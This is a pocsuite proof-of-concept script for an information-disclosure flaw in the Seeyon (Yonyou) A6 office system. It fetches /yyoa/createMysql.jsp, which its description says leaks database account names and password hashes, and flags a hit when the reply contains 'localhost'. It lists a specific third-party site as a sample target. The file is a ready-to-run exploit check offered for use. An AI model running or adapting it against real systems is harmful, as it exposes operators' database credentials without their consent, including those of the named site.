#!/usr/bin/env python
# coding: utf-8



from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = ''  # vul ID
    version = '1'
    author = ['']
    vulDate = ''
    createDate = ''
    updateDate = ''
    references = ['http://www.wooyun.org/bugs/wooyun-2015-0110538']
    name = '用友致远A6协同系统createMysql.jsp信息泄露'
    appPowerLink = 'www.seeyon.com'
    appName = '致远软件'
    appVersion = 'A6'
    vulType = 'Information Disclosure'
    desc = '''
           信息文件没有进行权限判断，该漏洞泄露了数据库用户的账号，密码hash.
    '''
    # the sample sites for examine
    samples = ['http://oa.wnq.com.cn/',]


    def _verify(self):
        result = {}
        target_url = '/yyoa/createMysql.jsp' 
        response = req.get(self.url + target_url, timeout=10)
        content = response.content

        if 'localhost' in content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + target_url

        return self.parse_attack(result)


    def _attack(self):
        return self._verify()


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')

        return output


register(TestPOC)
